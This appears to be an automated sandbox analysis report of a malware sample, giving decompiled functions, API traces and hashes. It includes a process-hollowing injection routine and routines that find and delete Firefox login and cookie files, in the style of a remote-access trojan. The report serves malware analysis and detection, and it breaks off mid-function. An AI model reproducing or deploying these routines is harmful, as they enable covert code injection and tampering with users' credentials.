                                    							 *0x46b4dc = _t3;
                                    							L00442853(0x46b4d0, _t3);
                                    							_t16 = 0;
                                    						} else {
                                    							_t16 = _t15 | 0xffffffff;
                                    						}
                                    						E004401F5(0);
                                    					} else {
                                    						_t16 = _t15 | 0xffffffff;
                                    					}
                                    					E004401F5(_t19);
                                    					return _t16;
                                    				} else {
                                    					return 0;
                                    				}
                                    			}

                                    Instruction address per C-code line above (the side-by-side column layout was lost in extraction):
                                    0x0043cfe8
                                    0x0043cfee
                                    0x0043cfef
                                    0x0043cff4
                                    0x0043cff9
                                    0x0043cffd
                                    0x0043d005
                                    0x0043d00d
                                    0x0043d01a
                                    0x0043d01f
                                    0x0043d024
                                    0x0043d00f
                                    0x0043d00f
                                    0x0043d00f
                                    0x0043d028
                                    0x0043cfff
                                    0x0043cfff
                                    0x0043cfff
                                    0x0043d02f
                                    0x0043d039
                                    0x0043cfea
                                    0x0043cfec
                                    0x0043cfec

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp Download File
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                                    • Instruction ID: fba902ad4ccf31a8b90f9fdf44a17567959da2f799f45fbd848029ef9f978f3d
                                    • Opcode Fuzzy Hash: 18f2041ca1429938108e02d2a53756847af81262eafccf0d74fd8bb75016ea07
                                    • Instruction Fuzzy Hash: 56E0A02290541160E239363B7C0565B0265CBC973DF10432BF624C62C2EFAC884341AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 91%
                                    			E0043D03A(void* __ebx, void* __ecx) {
                                    				// Counterpart of E0043CFE1 above on the second environment table:
                                    				// guard *0x46b4d4, result stored in *0x46b4d8, same 0 / -1 return convention.
                                    				intOrPtr _t2;
                                    				signed int _t14;
                                    				signed int _t15;
                                    
                                    				if( *0x46b4d4 == 0) {
                                    					_push(_t14);
                                    					_t18 = E0044765D(__ecx);
                                    					if(_t18 != 0) {                // decompiler printed the undeclared _t1 here; the value tested is _t18
                                    						_t2 = E0043D15F(__ebx, _t18); // executed
                                    						if(_t2 != 0) {
                                    							 *0x46b4d8 = _t2;
                                    							L00442853(0x46b4d4, _t2);
                                    							_t15 = 0;
                                    						} else {
                                    							_t15 = _t14 | 0xffffffff;
                                    						}
                                    						E004401F5(0);
                                    					} else {
                                    						_t15 = _t14 | 0xffffffff;
                                    					}
                                    					E004401F5(_t18);
                                    					return _t15;
                                    				} else {
                                    					return 0;
                                    				}
                                    			}

                                    0x0043d041
                                    0x0043d047
                                    0x0043d04d
                                    0x0043d051
                                    0x0043d059
                                    0x0043d061
                                    0x0043d06e
                                    0x0043d073
                                    0x0043d078
                                    0x0043d063
                                    0x0043d063
                                    0x0043d063
                                    0x0043d07c
                                    0x0043d053
                                    0x0043d053
                                    0x0043d053
                                    0x0043d083
                                    0x0043d08d
                                    0x0043d043
                                    0x0043d045
                                    0x0043d045

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: _free
                                    • String ID:
                                    • API String ID: 269201875-0
                                    • Opcode ID: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
                                    • Instruction ID: 74d36269402cbfa58112ba2610b1878482336c4429228e10655473553982713d
                                    • Opcode Fuzzy Hash: 0ed99ebbe2187b1f32701bb3281fabb5ff88b2b1b91a9808e210955f1cab387e
                                    • Instruction Fuzzy Hash: 89E0ED22A0941061E629323E7C4176B02668BC677DF21132BF528C62C2EFBC488381AE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: H_prolog
                                    • String ID:
                                    • API String ID: 3519838083-0
                                    • Opcode ID: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                                    • Instruction ID: e6e99268b29485b263ac33084d07fd67f49e3475c5b5c63b65d8ccfcab0936ee
                                    • Opcode Fuzzy Hash: 944fb353753fac14d10f0a7ff01711820957b56d157fc21c1c4a6115c61adfc2
                                    • Instruction Fuzzy Hash: 1B218571B001055BCB14EFB6858A6BE77AAAF84314F10403FE415BB2C2DBBC5E019799
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0043F348: RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389
                                    • _free.LIBCMT ref: 004483C0
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap_free
                                    • String ID:
                                    • API String ID: 614378929-0
                                    • Opcode ID: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
                                    • Instruction ID: 60c65a57f4404dc7eec93e126a54dda1ba11399514c1d014c30e87a140478a45
                                    • Opcode Fuzzy Hash: 1c4e2f15c0be4fd7432d5764b9d18203d050bdf7f8d2042484f8342e9df57e93
                                    • Instruction Fuzzy Hash: 8C01D6722003456BF3218E6A984195EFBE9EB85374F25052EE98493280EB35A905C768
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 00422251: recv.WS2_32(?,?,?,?), ref: 0042225C
                                    • WSAGetLastError.WS2_32 ref: 0042219B
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastrecv
                                    • String ID:
                                    • API String ID: 2514157807-0
                                    • Opcode ID: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                                    • Instruction ID: 5fd3ebf0e0d9901e6086a92a38d31c1d4f4930f82062b2ddb0320275891adbe9
                                    • Opcode Fuzzy Hash: 775403e6fa1c86be6d548b2784bdb667b06ff57a934a787a42b00bd7c27719c5
                                    • Instruction Fuzzy Hash: B7F0A43230C1297A9F189959FE94C7933459F85374BB0436BFE3AC65F0EA6998602149
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000008,00000000,00000000,?,00441D97,00000001,00000364,?,00000000,00000000,004368F8,00000000,?,?,0043697C,00000000), ref: 0043F389
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
                                    • Instruction ID: 680b6e8bc4c2fa124abf68bcdd5a812fa191381f72dfdd1accecd8568f1e318d
                                    • Opcode Fuzzy Hash: e21e4b0bf605aaaf0e10b68ce74f52e963093a8405524f63b13cd602651aef51
                                    • Instruction Fuzzy Hash: 8AF0E931A00321AADF216A639C45B5B3788AF4D7B1F15A037FC04DB690DA3CDC5986ED
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                      • Part of subcall function 0042226A: send.WS2_32(?,?,?,?), ref: 00422275
                                    • WSAGetLastError.WS2_32 ref: 0042220C
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ErrorLastsend
                                    • String ID:
                                    • API String ID: 1802528911-0
                                    • Opcode ID: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                                    • Instruction ID: 207b8048d6da47c8d3e1bf0cf2b23625c58979fe3f9e08f58dd8cb8bfe01de6d
                                    • Opcode Fuzzy Hash: 8cb09f3eb5d4e7103086a5d97c8df369fda03b4f8b26fdb2e33335adb8823741
                                    • Instruction Fuzzy Hash: 19F0BB3530C534FADF18995CFE548393341AF45330B70439BF939866F0DA6E5850917A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • RtlAllocateHeap.NTDLL(00000000,0043001C,?,?,00431747,?,?,0046C500,?,?,0040B6CB,0043001C,?,?,?,?), ref: 0043F9BE
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: AllocateHeap
                                    • String ID:
                                    • API String ID: 1279760036-0
                                    • Opcode ID: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                                    • Instruction ID: 400f104e77b540acbfcd3781324d28ce3e91d9a3d9d75f8370708e8767061156
                                    • Opcode Fuzzy Hash: 20626a587c955ce6a9034e6f34a1cf2dbef27dc7ff66e29b306da7decd8106d9
                                    • Instruction Fuzzy Hash: 01E02BB290022177DB2126625C0075B36489F5D7B1F103037FD05922C0DB6CCC0582EE
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • socket.WS2_32(00000000,00000001,00000006), ref: 004049AC
                                      • Part of subcall function 004049DE: WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Startupsocket
                                    • String ID:
                                    • API String ID: 3996037109-0
                                    • Opcode ID: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                                    • Instruction ID: 643c1d6dd67993fbe743bd4810411797e70fdf622d87f5941d6678f6439cf7cf
                                    • Opcode Fuzzy Hash: 57e39759065e94ff74e98b7e35a5d3c8348f39f3f93ca1ad8d88c95b428a27d8
                                    • Instruction Fuzzy Hash: 68F0BEF10057905AE7314F344880393BFD45B52318F14897FE6D2A3BC2C2B9A819C76A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    • WSAStartup.WS2_32(00000202,00000000), ref: 004049F3
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Startup
                                    • String ID:
                                    • API String ID: 724789610-0
                                    • Opcode ID: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                                    • Instruction ID: 820ae791bcbb1d2b57b63688d1298c64991293a60e6d01c8c57279511ad2648c
                                    • Opcode Fuzzy Hash: 89c49b222f636443e58f1b3fbdfa0b01495877bced7cab345007ae3e0c4764c4
                                    • Instruction Fuzzy Hash: 59D0123255861C4ED611AAB4AD0F8A5B76CC313A12F4003BAACB5C25D3F650572CC2FB
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    APIs
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: send
                                    • String ID:
                                    • API String ID: 2809346765-0
                                    • Opcode ID: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                                    • Instruction ID: fff77dfbf1f0459fa3aaeb9656e953647c3761fb795b74ea4a0806b79efbc88b
                                    • Opcode Fuzzy Hash: b02335b8f7ea2efaad70bddb1f33b0a78e66c9a69ef7c03d8dd5e29a9a49d19b
                                    • Instruction Fuzzy Hash: 70C04C79104608BB9B061FA19D08C793B69D7456617008025B90556151D576DA5096B5
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    Non-executed Functions

                                    C-Code - Quality: 86%
                                    			E0041412B(WCHAR* __ecx, void* __edx, struct _PROCESS_INFORMATION* _a4) {
                                    				void _v8;
                                    				signed int _v12;
                                    				void* _v16;
                                    				CONTEXT* _v20;
                                    				WCHAR* _v24;
                                    				struct _STARTUPINFOW _v92;
                                    				void* __edi;
                                    				void* _t58;
                                    				void* _t72;
                                    				void* _t73;
                                    				int _t83;
                                    				intOrPtr* _t95;
                                    				void* _t98;
                                    				signed int _t102;
                                    				void* _t104;
                                    				void* _t106;
                                    				CONTEXT* _t110;
                                    				void* _t113;
                                    				CONTEXT* _t114;
                                    				struct _PROCESS_INFORMATION* _t116;
                                    
                                    				_v8 = _v8 & 0x00000000;
                                    				_v16 = __edx;
                                    				_v24 = __ecx;
                                    				if( *__edx == 0x5a4d) {
                                    					_t95 =  *((intOrPtr*)(__edx + 0x3c)) + __edx;
                                    					if( *_t95 == 0x4550) {
                                    						_push(_t106);
                                    						L00431F00(_t106,  &_v92, 0, 0x44);
                                    						_t116 = _a4;
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						asm("stosd");
                                    						if(CreateProcessW(0, _v24, 0, 0, 0, 4, 0, 0,  &_v92, _t116) == 0) {
                                    							L21:
                                    							_t58 = 0;
                                    							L22:
                                    							L23:
                                    							return _t58;
                                    						}
                                    						CloseHandle(_v92.hStdInput);
                                    						CloseHandle(_v92.hStdOutput);
                                    						CloseHandle(_v92.hStdError);
                                    						_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                    						_v20 = _t110;
                                    						_t110->ContextFlags = 0x10007;
                                    						_t14 =  &(_t116->hThread); // 0xffffdcf2
                                    						if(GetThreadContext( *_t14, _t110) == 0 || ReadProcessMemory(_t116->hProcess, _t110->Ebx + 8,  &_v8, 4, 0) == 0) {
                                    							L20:
                                    							TerminateProcess(_t116->hProcess, 0);
                                    							CloseHandle(_t116->hProcess);
                                    							_t50 =  &(_t116->hThread); // 0xffffdcf2
                                    							CloseHandle( *_t50);
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							asm("stosd");
                                    							goto L21;
                                    						} else {
                                    							_t72 = _v8;
                                    							if(_t72 ==  *(_t95 + 0x34)) {
                                    								NtUnmapViewOfSection(_t116->hProcess, _t72);
                                    							}
                                    							_t73 = VirtualAllocEx(_t116->hProcess,  *(_t95 + 0x34),  *(_t95 + 0x50), 0x3000, 0x40);
                                    							_v24 = _t73;
                                    							if(_t73 == 0) {
                                    								goto L20;
                                    							} else {
                                    								_t113 = _v16;
                                    								if(WriteProcessMemory(_t116->hProcess, _t73, _t113,  *(_t95 + 0x54), 0) == 0) {
                                    									goto L20;
                                    								}
                                    								_v12 = _v12 & 0x00000000;
                                    								if(0 >=  *(_t95 + 6)) {
                                    									L14:
                                    									_t98 = _t95 + 0x34;
                                    									_t114 = _v20;
                                    									if(_v8 ==  *_t98) {
                                    										L17:
                                    										_t114->Eax =  *((intOrPtr*)(_t95 + 0x28)) + _v24;
                                    										_t48 =  &(_t116->hThread); // 0xffffdcf2
                                    										if(SetThreadContext( *_t48, _t114) == 0) {
                                    											goto L20;
                                    										}
                                    										_t49 =  &(_t116->hThread); // 0xffffdcf2
                                    										if(ResumeThread( *_t49) == 0xffffffff) {
                                    											goto L20;
                                    										}
                                    										_t58 = 1;
                                    										goto L22;
                                    									}
                                    									_t83 = WriteProcessMemory(_t116->hProcess, _t114->Ebx + 8, _t98, 4, 0);
                                    									if(_t83 != 0) {
                                    										goto L17;
                                    									}
                                    									TerminateProcess(_t116->hProcess, _t83);
                                    									goto L21;
                                    								}
                                    								_t104 = 0;
                                    								_v16 = 0;
                                    								do {
                                    									_t28 = _t113 + 0x3c; // 0x83ffc983
                                    									WriteProcessMemory( *_t116,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x104)) + _v24,  *((intOrPtr*)( *_t28 + _t104 + _t113 + 0x10c)) + _t113,  *( *_t28 + _t104 + _t113 + 0x108), 0);
                                    									_t37 =  &_v16; // 0x41433b
                                    									_t102 = _v12 + 1;
                                    									_t104 =  *_t37 + 0x28;
                                    									_v12 = _t102;
                                    									_v16 = _t104;
                                    								} while (_t102 < ( *(_t95 + 6) & 0x0000ffff));
                                    								goto L14;
                                    							}
                                    						}
                                    					}
                                    					_t58 = 0;
                                    					goto L23;
                                    				}
                                    				return 0;
                                    			}

                                    0x00414131
                                    0x0041413a
                                    0x0041413d
                                    0x00414143
                                    0x00414150
                                    0x00414158
                                    0x00414162
                                    0x0041416b
                                    0x00414170
                                    0x0041417a
                                    0x0041417c
                                    0x0041417d
                                    0x0041417e
                                    0x00414198
                                    0x00414322
                                    0x00414322
                                    0x00414324
                                    0x00414326
                                    0x00000000
                                    0x00414326
                                    0x004141a7
                                    0x004141ac
                                    0x004141b1
                                    0x004141c4
                                    0x004141c7
                                    0x004141ca
                                    0x004141d0
                                    0x004141db
                                    0x00414301
                                    0x00414305
                                    0x00414313
                                    0x00414315
                                    0x00414318
                                    0x0041431e
                                    0x0041431f
                                    0x00414320
                                    0x00414321
                                    0x00000000
                                    0x00414203
                                    0x00414203
                                    0x00414209
                                    0x0041420e
                                    0x0041420e
                                    0x00414223
                                    0x00414229
                                    0x0041422e
                                    0x00000000
                                    0x00414234
                                    0x00414234
                                    0x00414248
                                    0x00000000
                                    0x00000000
                                    0x0041424e
                                    0x00414258
                                    0x004142a2
                                    0x004142a5
                                    0x004142a8
                                    0x004142ad
                                    0x004142d5
                                    0x004142dc
                                    0x004142e2
                                    0x004142ed
                                    0x00000000
                                    0x00000000
                                    0x004142ef
                                    0x004142fb
                                    0x00000000
                                    0x00000000
                                    0x004142fd
                                    0x00000000
                                    0x004142fd
                                    0x004142c0
                                    0x004142c8
                                    0x00000000
                                    0x00000000
                                    0x004142cd
                                    0x00000000
                                    0x004142cd
                                    0x0041425a
                                    0x0041425c
                                    0x0041425f
                                    0x0041425f
                                    0x00414284
                                    0x0041428d
                                    0x00414290
                                    0x00414295
                                    0x00414298
                                    0x0041429b
                                    0x0041429e
                                    0x00000000
                                    0x0041425f
                                    0x0041422e
                                    0x004141db
                                    0x0041415a
                                    0x00000000
                                    0x0041415a
                                    0x00000000

                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID:
                                    • String ID: ;CA
                                    • API String ID: 0-233881251
                                    • Opcode ID: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                    • Instruction ID: bd197fad053dbfc90d5835daa1a59b9970fe7a36a364e2f4af16486f2ac585b0
                                    • Opcode Fuzzy Hash: 14ea15bd37de55cb440a8d85a26c650e3b8200264586c93c0b4e6515a21e5717
                                    • Instruction Fuzzy Hash: 09518D70600604BFEB108FA5CC45FAABBB9FF84742F144065FA54E62A1C775D990DB68
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 95%
                                    			E0040A012(void* __ebx, void* __edi, void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				char _v148;
                                    				struct _WIN32_FIND_DATAA _v468;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t45;
                                    				signed int _t58;
                                    				signed int _t59;
                                    				signed int _t73;
                                    				signed int _t75;
                                    				char* _t108;
                                    				signed int _t109;
                                    				char* _t129;
                                    				void* _t130;
                                    				void* _t134;
                                    				void* _t135;
                                    				void* _t136;
                                    				void* _t137;
                                    
                                    				_t142 = __eflags;
                                    				_t134 = __edi;
                                    				_t89 = __ebx;
                                    				E004020D5(__ebx,  &_v100);
                                    				E004020D5(__ebx,  &_v76);
                                    				E004020D5(__ebx,  &_v28);
                                    				_t45 = E00402084(_t89,  &_v124, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                    				L00401FD1( &_v28, _t46, _t135, L004075C2(_t89,  &_v52, L0043988A(_t89, __eflags, "UserProfile"), _t134, _t142, _t45));
                                    				L00401FC7();
                                    				L00401FC7();
                                    				_t128 =  &_v28;
                                    				_t136 = FindFirstFileA(L00401F95(E00407558( &_v124,  &_v28, _t142, "*")),  &_v468);
                                    				L00401FC7();
                                    				_t143 = _t136 - 0xffffffff;
                                    				if(_t136 != 0xffffffff) {
                                    					while(1) {
                                    						L15:
                                    						__eflags = FindNextFileA(_t136,  &_v468);
                                    						if(__eflags == 0) {
                                    							break;
                                    						}
                                    						__eflags = _v468.dwFileAttributes & 0x00000010;
                                    						if((_v468.dwFileAttributes & 0x00000010) == 0) {
                                    							continue;
                                    						}
                                    						_t108 =  &(_v468.cFileName);
                                    						__eflags =  *_t108 - 0x2e;
                                    						if( *_t108 != 0x2e) {
                                    							L5:
                                    							_t129 =  &(_v468.cFileName);
                                    							_t109 = 0;
                                    							__eflags = 0;
                                    							while(1) {
                                    								_t58 =  *(_t129 + _t109) & 0x000000ff;
                                    								_t130 = "..";
                                    								__eflags = _t58 -  *((intOrPtr*)(_t130 + _t109));
                                    								_t128 =  &(_v468.cFileName);
                                    								if(_t58 !=  *((intOrPtr*)(_t130 + _t109))) {
                                    									break;
                                    								}
                                    								_t109 = _t109 + 1;
                                    								__eflags = _t109 - 3;
                                    								if(_t109 != 3) {
                                    									continue;
                                    								}
                                    								_t59 = 0;
                                    								L10:
                                    								__eflags = _t59;
                                    								if(__eflags != 0) {
                                    									L00401FD1( &_v100, _t61, _t136, E00405343(_t89,  &_v52, E00407558( &_v148,  &_v28, __eflags,  &(_v468.cFileName)), _t134, __eflags, "\\logins.json"));
                                    									L00401FC7();
                                    									L00401FC7();
                                    									_t128 = E00407558( &_v52,  &_v28, __eflags,  &(_v468.cFileName));
                                    									L00401FD1( &_v76, _t67, _t136, E00405343(_t89,  &_v148, _t67, _t134, __eflags, "\\key3.db"));
                                    									L00401FC7();
                                    									L00401FC7();
                                    									_t73 = DeleteFileA(L00401F95( &_v100));
                                    									__eflags = _t73;
                                    									if(_t73 == 0) {
                                    										GetLastError();
                                    									}
                                    									_t75 = DeleteFileA(L00401F95( &_v76));
                                    									__eflags = _t75;
                                    									if(_t75 == 0) {
                                    										GetLastError();
                                    									}
                                    								}
                                    								goto L15;
                                    							}
                                    							asm("sbb eax, eax");
                                    							_t59 = _t58 | 0x00000001;
                                    							__eflags = _t59;
                                    							goto L10;
                                    						}
                                    						__eflags =  *(_t108 + 1) & 0x000000ff;
                                    						if(( *(_t108 + 1) & 0x000000ff) == 0) {
                                    							continue;
                                    						}
                                    						goto L5;
                                    					}
                                    					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins Cleared!]");
                                    					L0040A6EF(_t89, _t128, __eflags);
                                    					FindClose(_t136);
                                    					goto L17;
                                    				} else {
                                    					FindClose(_t136);
                                    					E00402084(_t89, _t137 - 0x18, "\n[Firefox StoredLogins not found]");
                                    					L0040A6EF(_t89,  &_v28, _t143);
                                    					L17:
                                    					L00401FC7();
                                    					L00401FC7();
                                    					L00401FC7();
                                    					return 1;
                                    				}
			}

                                    Instruction addresses: 0x0040a012 to 0x0040a22c (per-line address column of the listing above)

                                    APIs
                                    • FindFirstFileA.KERNEL32(00000000,?,00000000,\AppData\Roaming\Mozilla\Firefox\Profiles\), ref: 0040A091
                                    • FindClose.KERNEL32(00000000), ref: 0040A0AB
                                    • FindNextFileA.KERNEL32(00000000,?), ref: 0040A1E2
                                    • FindClose.KERNEL32(00000000), ref: 0040A208
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000000C.00000002.518343742.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 0000000C.00000002.519789237.000000000046F000.00000040.00000001.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: Find$CloseFile$FirstNext
                                    • String ID: [Firefox StoredLogins Cleared!]$[Firefox StoredLogins not found]$UserProfile$\AppData\Roaming\Mozilla\Firefox\Profiles\$\key3.db$\logins.json
                                    • API String ID: 1164774033-3681987949
                                    • Opcode ID: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
                                    • Instruction ID: f2c277aebdcb09342038ebf6bf1e841689b7d3b7dff34d34010c96f776921475
                                    • Opcode Fuzzy Hash: 73ef769315aad6c42878add81738c3c9a88201f7eece84d44baa8c544f9c8ca2
                                    • Instruction Fuzzy Hash: B451943091025A5BCB14FB71DD569EEB774AF11305F4001BFF806B60E2EF785A89CA5A
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 89%
                                    			E0040A22D(void* __edi, void* __eflags) {
                                    				char _v28;
                                    				char _v52;
                                    				char _v76;
                                    				char _v100;
                                    				char _v124;
                                    				struct _WIN32_FIND_DATAA _v444;
                                    				void* __ebx;
                                    				void* __esi;
                                    				void* __ebp;
                                    				void* _t35;
                                    				signed int _t56;
                                    				signed int _t57;
                                    				long _t68;
                                    				char* _t92;
                                    				signed int _t93;
                                    				void* _t102;
                                    				char* _t105;
                                    				void* _t106;
                                    				void* _t108;
                                    				void* _t109;
                                    				void* _t110;
                                    				void* _t111;
                                    
                                    				_t116 = __eflags;
                                    				_t108 = __edi;
                                    				E004020D5(0,  &_v52);
                                    				E004020D5(0,  &_v28);
                                    				_t35 = E00402084(0,  &_v100, "\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\");
                                    				L00401FD1( &_v28, _t36, _t109, L004075C2(0,  &_v76, L0043988A(0, __eflags, "UserProfile"), _t108, _t116, _t35));
                                    				L00401FC7();
                                    				L00401FC7();
                                    				_t104 =  &_v28;
                                    				_t110 = FindFirstFileA(L00401F95(E00407558( &_v100,  &_v28, _t116, "*")),  &_v444);
                                    				L00401FC7();
                                    				_t117 = _t110 - 0xffffffff;
                                    				if(_t110 != 0xffffffff) {
                                    					__eflags = FindNextFileA(_t110,  &_v444);
                                    					if(__eflags == 0) {
                                    						L17:
                                    						E00402084(0, _t111 - 0x18, "\n[Firefox Cookies not found]");
                                    						L0040A6EF(0, _t104, __eflags);
                                    						FindClose(_t110);
                                    						goto L18;
                                    					} else {
                                    						__eflags = 0;
                                    						do {
                                    							__eflags = _v444.dwFileAttributes & 0x00000010;
                                    							if((_v444.dwFileAttributes & 0x00000010) == 0) {
                                    								goto L16;
                                    							} else {
                                    								_t92 =  &(_v444.cFileName);
                                    								__eflags =  *_t92 - 0x2e;
                                    								if( *_t92 != 0x2e) {
                                    									L8:
                                    									_t105 =  &(_v444.cFileName);
                                    									_t93 = 0;
                                    									while(1) {
                                    										_t56 =  *(_t105 + _t93) & 0x000000ff;
                                    										_t106 = "..";
                                    										__eflags = _t56 -  *((intOrPtr*)(_t106 + _t93));
                                    										_t104 =  &(_v444.cFileName);
                                    										if(_t56 !=  *((intOrPtr*)(_t106 + _t93))) {
                                    											break;
                                    										}
                                    										_t93 = _t93 + 1;
                                    										__eflags = _t93 - 3;
                                    										if(_t93 != 3) {
                                    											continue;
                                    										} else {
                                    											_t57 = 0;
                                    										}
                                    										L13:
                                    										__eflags = _t57;
                                    										if(__eflags == 0) {
                                    											goto L16;
                                    										} else {
                                    											_t104 = E00407558( &_v124,  &_v28, __eflags,  &(_v444.cFileName));
                                    											L00401FD1( &_v52, _t59, _t110, E00405343(0,  &_v76, _t59, _t108, __eflags, "\\cookies.sqlite"));
                                    											L00401FC7();
                                    											L00401FC7();
                                    											__eflags = DeleteFileA(L00401F95( &_v52));
                                    											if(__eflags != 0) {
                                    												_t102 = _t111 - 0x18;
                                    												_push("\n[Firefox cookies found, cleared!]");
                                    												goto L2;
                                    											} else {
                                    												_t68 = GetLastError();
                                    												__eflags = _t68 != 0;
                                    												if(_t68 != 0) {
                                    													FindClose(_t110);
                                    												} else {
                                    													goto L16;
                                    												}
                                    											}
                                    										}
                                    										goto L19;
                                    									}
                                    									asm("sbb eax, eax");
                                    									_t57 = _t56 | 0x00000001;
                                    									__eflags = _t57;
                                    									goto L13;
                                    								} else {
                                    									__eflags =  *(_t92 + 1) & 0x000000ff;
                                    									if(( *(_t92 + 1) & 0x000000ff) == 0) {
                                    										goto L16;
                                    									} else {
                                    										goto L8;
                                    									}
                                    								}
                                    							}
                                    							goto L19;
                                    							L16:
                                    							__eflags = FindNextFileA(_t110,  &_v444);
                                    						} while (__eflags != 0);
                                    						goto L17;
                                    					}
                                    				} else {
                                    					FindClose(_t110);
                                    					_t102 = _t111 - 0x18;
                                    					_push("\n[Firefox Cookies not found]");
                                    					L2:
                                    					E00402084(0, _t102);
